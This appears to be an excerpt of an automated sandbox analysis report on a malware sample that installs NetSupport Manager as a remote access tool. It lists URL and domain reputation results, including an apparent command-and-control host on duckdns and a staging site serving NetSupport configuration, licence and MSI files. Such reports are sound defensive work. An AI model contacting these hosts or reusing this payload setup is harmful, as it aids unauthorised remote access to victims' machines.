                                C:\Program Files (x86)\NetSupport\NetSupport Manager\ucrtbase.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\vccorlib140.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\vcruntime140.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe3%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://www.pci.co.uk/supportsupport0%VirustotalBrowse
                                http://www.netsupportsoftware.com1%VirustotalBrowse
                                http://pesterbdd.com/images/Pester.png410%VirustotalBrowse
                                http://%s/testpage.htmwininet.dll%s:%sCredUIPromptForCredentialsWcredui.dll0%Avira URL Cloudsafe
                                http://www.netsupportschool.com/tutor-assistant.asp1110%Avira URL Cloudsafe
                                http://www.netsupportsoftware.com0%Avira URL Cloudsafe
                                http://pesterbdd.com/images/Pester.png40%Avira URL Cloudsafe
                                http://www.pci.co.uk/supportsupport0%Avira URL Cloudsafe
                                https://help.netsupportschool.com/%s-%s/Default.htmhttps://help.netsupportschool.com/%s-%s/Default.h0%Avira URL Cloudsafe
                                http://127.0.0.1RESUMEPRINTING0%Avira URL Cloudsafe
                                http://megaeth1337.duckdns.org:1773/b0%Avira URL Cloudsafe
                                http://%s/favicon.icoshcore.dllGetDpiForMonitorPCI0%Avira URL Cloudsafe
                                https://okolinabeauty.com/choh/Client32.ini0%Avira URL Cloudsafe
                                https://netsupportschool.com/whats_newAn0%Avira URL Cloudsafe
                                http://62.172.138.12/url_redirect.htm#The0%Avira URL Cloudsafe
                                https://okolinabeauty.com/choh/NSM.lic0%Avira URL Cloudsafe
                                http://www.netsupportsoftware.com/support/clients.asp?version=1400KEYSHOWCLOSEKEYSHOWSTOPKEYSHOWRESU0%Avira URL Cloudsafe
                                http://localhost/weblock.htmForcePowerOffConfirmationDisablePrintSurveyAnswerCountStudentVolumeLockS0%Avira URL Cloudsafe
                                http://megaeth1337.duckdns.org:1773/(0%Avira URL Cloudsafe
                                https://provisionserver.domain/amtscsTechLogHotKeyPauseHotKeyEndScrapeShowApp225.16.8.69KeepAspectSe0%Avira URL Cloudsafe
                                http://www.idk.co.jp0%Avira URL Cloudsafe
                                http://megaeth1337.duckdns.org:1773/C0%Avira URL Cloudsafe
                                https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
                                http://%s/gateway.htm0%Avira URL Cloudsafe
                                http://www.flexerasoftware.com00%Avira URL Cloudsafe
                                http://www.netsupportschool.com/tutor-assistant.asp0%Avira URL Cloudsafe
                                http://www.netsupportsoftware.com40%Avira URL Cloudsafe
                                http://megaeth1337.duckdns.org:1773/:0%Avira URL Cloudsafe
                                http://megaeth1337.duckdns.org:1773/0%Avira URL Cloudsafe
                                http://www.pci.co.uk/support0%Avira URL Cloudsafe
                                http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
                                http://www.acer-group.com/public/index/privacy.htm%scountry.dat0%Avira URL Cloudsafe
                                http://megaeth1337.duckdns.org:1773/Rs0%Avira URL Cloudsafe
                                http://ocsp.thawte.com00%Avira URL Cloudsafe
                                http://www.microsoft.0%Avira URL Cloudsafe
                                https://www.netsupportschool.com/ios-android/1110%Avira URL Cloudsafe
                                http://www.netsupportsoftware.com/support0%Avira URL Cloudsafe
                                http://megaeth1337.duckdns.org:1773/$0%Avira URL Cloudsafe
                                http://localhost/ApprovedWebList.htmPrintSurveyInternet60%Avira URL Cloudsafe
                                http://megaeth1337.duckdns.org:1773/n0%Avira URL Cloudsafe
                                https://okolinabeauty.com/choh/vrep.msi0%Avira URL Cloudsafe
                                http://megaeth1337.duckdns.org:1773/f0%Avira URL Cloudsafe
                                http://www.quovadis.bm00%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                		104.26.1.231
                                		truefalse
                                  		high
                                  okolinabeauty.com
                                  		176.126.113.166
                                  		truetrue
                                    		unknown
                                    megaeth1337.duckdns.org
                                    		185.170.144.66
                                    		truetrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://geo.netsupportsoftware.com/location/loca.aspfalse
                                        		high
                                        https://okolinabeauty.com/choh/Client32.initrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://okolinabeauty.com/choh/NSM.lictrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://okolinabeauty.com/choh/vrep.msitrue
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://pesterbdd.com/images/Pester.png4Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000005014000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 10%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.netsupportsoftware.comwscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114078859397.0000000002945000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • 1%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://%s/testpage.htmwininet.dll%s:%sCredUIPromptForCredentialsWcredui.dllclient32.exe, 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://github.com/mgravell/protobuf-netJPyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpfalse
                                          		high
                                          http://www.pci.co.uk/supportsupportwscript.exe, 00000006.00000003.114046944500.000000000B45E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, MSIF373.tmp, 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp, MSIF373.tmp, 00000019.00000000.114135574095.0000000000637000.00000008.00000001.01000000.0000000C.sdmp, MSIF985.tmp, 0000001B.00000000.114151205351.0000000000977000.00000008.00000001.01000000.0000000D.sdmp, MSIF985.tmp, 0000001B.00000002.114157116679.0000000000977000.00000004.00000001.01000000.0000000D.sdmp, checkdvd.exe, 0000001C.00000002.114215767889.00000000007CA000.00000004.00000001.01000000.0000000E.sdmp, checkdvd.exe, 0000001C.00000000.114214666288.00000000007CA000.00000008.00000001.01000000.0000000E.sdmp, MSI1387.tmp, 0000001D.00000002.114241948191.0000000001047000.00000004.00000001.01000000.0000000F.sdmp, MSI1387.tmp, 0000001D.00000000.114217707443.0000000001047000.00000008.00000001.01000000.0000000F.sdmp, winst64.exe, 0000001E.00000000.114225758017.00007FF679395000.00000008.00000001.01000000.00000010.sdmp, winst64.exe, 0000001E.00000002.114227786314.00007FF679395000.00000004.00000001.01000000.00000010.sdmp, MSI23E6.tmp, 0000001F.00000002.114270878224.0000000000BF7000.00000004.00000001.01000000.00000014.sdmp, MSI23E6.tmp, 0000001F.00000000.114259508895.0000000000BF7000.00000008.00000001.01000000.00000014.sdmp, client32.exe, 00000020.00000002.115188136908.000000006CD4D000.00000004.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188311380.000000006CD4D000.00000004.00000001.01000000.00000016.sdmp, pcicfgui_client.exe, 00000022.00000002.114292209374.000000006B4AE000.00000004.00000001.01000000.00000022.sdmp, pcicfgui_client.exe, 00000022.00000002.114291271774.000000006B487000.00000004.00000001.01000000.00000022.sdmpfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.netsupportschool.com/tutor-assistant.asp111winst64.exe, 0000001E.00000002.114227786314.00007FF679395000.00000004.00000001.01000000.00000010.sdmp, client32.exe, 00000020.00000002.115188136908.000000006CD4D000.00000004.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188311380.000000006CD4D000.00000004.00000001.01000000.00000016.sdmp, pcicfgui_client.exe, 00000022.00000002.114292209374.000000006B4AE000.00000004.00000001.01000000.00000022.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://help.netsupportschool.com/%s-%s/Default.htmhttps://help.netsupportschool.com/%s-%s/Default.hclient32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://127.0.0.1RESUMEPRINTINGclient32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://aka.ms/odirmwswscript.exe, 00000000.00000003.113911180803.00000220FBF4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.113918390366.00000220FBF4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.113918129339.00000220FBF4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.113917709896.00000220FBF4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://megaeth1337.duckdns.org:1773/bclient32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://activate.netsupportsoftware.com/updatepcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpfalse
                                              		high
                                              http://%s/favicon.icoshcore.dllGetDpiForMonitorPCIpcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://github.com/Pester/Pester4Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000005014000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://62.172.138.12/url_redirect.htm#Thepcicfgui_client.exe, 00000022.00000002.114293124962.000000006C372000.00000002.00000001.01000000.00000022.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://github.com/mgravell/protobuf-netiPyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://netsupportschool.com/whats_newAnpcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://geo.netsupportsoftware.com/location/latlong.asp?lat=%s&lng=%s&lang=%sGetpcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpfalse
                                                    		high
                                                    http://crl.thawte.com/ThawteTimestampingCA.crl0wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://geo.netsupportsoftware.com/location/loca.aspYclient32.exe, 00000020.00000002.115177447611.0000000000A05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://aka.ms/pscore6lBPyyidau.vbs.exe, 00000004.00000002.113950407001.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://localhost/weblock.htmForcePowerOffConfirmationDisablePrintSurveyAnswerCountStudentVolumeLockSpcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.netsupportsoftware.com/support/clients.asp?version=1400KEYSHOWCLOSEKEYSHOWSTOPKEYSHOWRESUpcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://stackoverflow.com/q/11564914/23354;Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpfalse
                                                            		high
                                                            http://megaeth1337.duckdns.org:1773/(client32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.intel.com/support/eduhttp://www.hp.com/go/hpclassroommanagerpEventDatam_pExhibitingm_pExhpcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpfalse
                                                              		high
                                                              https://provisionserver.domain/amtscsTechLogHotKeyPauseHotKeyEndScrapeShowApp225.16.8.69KeepAspectSepcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.idk.co.jppcicfgui_client.exe, 00000022.00000002.114293124962.000000006C079000.00000002.00000001.01000000.00000022.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.google.compcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpfalse
                                                                		high
                                                                http://megaeth1337.duckdns.org:1773/Cclient32.exe, 00000020.00000003.114560515905.00000000031A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ocsp.quovadisoffshore.com0Pyyidau.vbs.exe, 00000004.00000002.113948697299.00000000031ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115184199438.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115021312689.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114973594833.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069509491.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114997019143.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115033721477.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114974072870.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114951277329.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115102531113.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115046659044.00000000033F2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069858643.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115149779823.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115046659044.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115172921966.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115046037274.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115033607252.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115008881521.00000000033E8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115115628288.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000002.114307415040.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000003.114303592438.0000000002C5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://%s/gateway.htmclient32.exe, 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePyyidau.vbs.exe, 00000004.00000002.113950407001.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.flexerasoftware.com0wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.netsupportschool.com/tutor-assistant.aspwinst64.exe, 0000001E.00000002.114227512458.0000000002D80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.netsupportsoftware.com4msiexec.exe, 00000013.00000003.114081471578.0000000002938000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://megaeth1337.duckdns.org:1773/:client32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://megaeth1337.duckdns.org:1773/client32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115177447611.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115183118649.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115177447611.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114560515905.0000000003231000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115183965861.000000000325D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115102203122.0000000000A56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.pci.co.uk/supportwinst64.exe, 0000001E.00000002.114227512458.0000000002D80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://activate.netsupportsoftware.com/update/?s=%s?s=1234%s5678noactlcpcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpfalse
                                                                    		high
                                                                    https://stackoverflow.com/q/14436606/23354Pyyidau.vbs.exe, 00000004.00000002.113950407001.00000000051F5000.00000004.00000800.00020000.00000000.sdmp, Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      http://pesterbdd.com/images/Pester.pngPyyidau.vbs.exe, 00000004.00000002.113950407001.0000000005014000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.acer-group.com/public/index/privacy.htm%scountry.datpcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://megaeth1337.duckdns.org:1773/Rsclient32.exe, 00000020.00000003.115172079833.000000000325D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlPyyidau.vbs.exe, 00000004.00000002.113950407001.0000000005014000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://ocsp.thawte.com0wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://github.com/mgravell/protobuf-netPyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.microsoft.cscript.exe, 00000026.00000002.114307415040.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000003.114303592438.0000000002C5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.netsupportschool.com/ios-android/111wscript.exe, 00000006.00000003.114046944500.000000000B45E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, MSIF373.tmp, 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp, MSIF373.tmp, 00000019.00000000.114135574095.0000000000637000.00000008.00000001.01000000.0000000C.sdmp, MSIF985.tmp, 0000001B.00000000.114151205351.0000000000977000.00000008.00000001.01000000.0000000D.sdmp, MSIF985.tmp, 0000001B.00000002.114157116679.0000000000977000.00000004.00000001.01000000.0000000D.sdmp, checkdvd.exe, 0000001C.00000002.114215767889.00000000007CA000.00000004.00000001.01000000.0000000E.sdmp, checkdvd.exe, 0000001C.00000000.114214666288.00000000007CA000.00000008.00000001.01000000.0000000E.sdmp, MSI1387.tmp, 0000001D.00000002.114241948191.0000000001047000.00000004.00000001.01000000.0000000F.sdmp, MSI1387.tmp, 0000001D.00000000.114217707443.0000000001047000.00000008.00000001.01000000.0000000F.sdmp, winst64.exe, 0000001E.00000000.114225758017.00007FF679395000.00000008.00000001.01000000.00000010.sdmp, MSI23E6.tmp, 0000001F.00000002.114270878224.0000000000BF7000.00000004.00000001.01000000.00000014.sdmp, MSI23E6.tmp, 0000001F.00000000.114259508895.0000000000BF7000.00000008.00000001.01000000.00000014.sdmp, pcicfgui_client.exe, 00000022.00000002.114291271774.000000006B487000.00000004.00000001.01000000.00000022.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.netsupportsoftware.com/supportmsiexec.exe, 00000013.00000003.114081150460.000000000297D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114080266581.000000000296F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114080181911.0000000002968000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114080859440.0000000002970000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114078918470.000000000294C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114081033705.0000000002978000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114079820477.0000000002949000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114080026944.000000000294C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.114078859397.0000000002945000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://megaeth1337.duckdns.org:1773/$client32.exe, 00000020.00000002.115177447611.0000000000A71000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.symauth.com/cps0(wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.apache.org/licenses/LICENSE-2.0.html4Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000005014000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://github.com/Pester/PesterPyyidau.vbs.exe, 00000004.00000002.113950407001.0000000005014000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://localhost/ApprovedWebList.htmPrintSurveyInternet6pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://geo.netsupportsoftware.com/location/loca.aspLatLongcloseclient32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmpfalse
                                                                                  		high
                                                                                  http://megaeth1337.duckdns.org:1773/nclient32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://megaeth1337.duckdns.org:1773/fclient32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
